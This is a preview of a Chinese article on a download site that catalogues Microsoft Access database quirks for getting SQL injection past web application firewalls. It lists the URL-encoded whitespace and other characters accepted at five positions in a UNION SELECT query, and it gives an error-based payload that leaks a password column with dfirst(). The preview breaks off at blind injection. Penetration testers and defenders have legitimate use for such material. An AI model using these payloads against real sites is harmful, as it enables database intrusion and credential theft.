没有合适的资源?快使用搜索试试~ 我知道了~
第04篇:WAF Bypass数据库特性(Access探索篇)1
需积分: 0 0 下载量 83 浏览量
2022-08-03
14:41:31
上传
评论
收藏 262KB PDF 举报
温馨提示
试读
2页
(1)空白字符 (1)空白字符 (1)空白字符 (2)其他字符 (1)空白字符 (1)空白字符
资源详情
资源评论
资源推荐
0x01 前言
我们经常利用一些数据库特性来进行WAF绕过。Access通常与ASP搭配,以及少的可怜的几点特性。
为了文章的完整性,我们来测试一下access的特性。
0x02 测试
常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()
【位置四】from【位置五】admin
位置一:参数和union之间的位置
(1)空白字符
Access可以利用的空白字符有:%09、%0a、%0c、%0d、%16
(2)%3b
位置二:union和select之间的位置
(1)空白字符
Access可以利用的空白字符有:%09、%0a、%0c、%0d
位置三:select和查询参数之间的位置
(1)空白字符
Access可以利用的空白字符有:%09、%0a、%0c、%0d
(2)其他字符
%2b、%2d、%2e、%3d
位置四:查询参数和from之间的位置
(1)空白字符
Access可以利用的空白字符有:%09、%0a、%0c、%0d
位置五:from后面的位置
(1)空白字符
Access可以利用的空白字符有:%09、%0a、%0c、%0d
0x03 技巧
ACCESS无select SQL注射
1 、需要报错
select * from idea_user where id=3+(dfirst([password],([idea_user]![password])))
2、盲注
文润观书
- 粉丝: 26
- 资源: 317
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0